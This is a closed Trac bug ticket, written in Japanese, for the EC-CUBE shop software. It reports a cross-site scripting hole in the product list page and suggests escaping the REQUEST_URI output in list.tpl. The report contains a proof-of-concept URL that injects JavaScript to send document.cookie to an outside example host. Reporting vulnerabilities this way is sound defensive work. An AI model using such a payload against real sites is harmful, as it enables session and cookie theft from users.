Ticket #152 (closed バグ指摘: 無効)

Opened 13 years ago

Last modified 12 years ago

商品一覧にXSS脆弱性

Reported by: adachi Owned by: somebody
Priority: Milestone: EC-CUBE
Component: フロント Version: 1.3系
Keywords: Cc:
修正済み:

Description

 http://demo.ec-cube.net/products/list.php?category_id=2'+window.open('http://www.example.com/?cookie='+document.cookie)+'

html/user_data/templates/list.tplの44行目・229行目の、

<!--{$smarty.server.REQUEST_URI|escape}-->で、

javascriptのエスケープを行う必要がある。

Change History

comment:1 Changed 12 years ago by takegami

  • Status changed from new to closed
  • Resolution set to 無効
Note: See TracTickets for help on using tickets.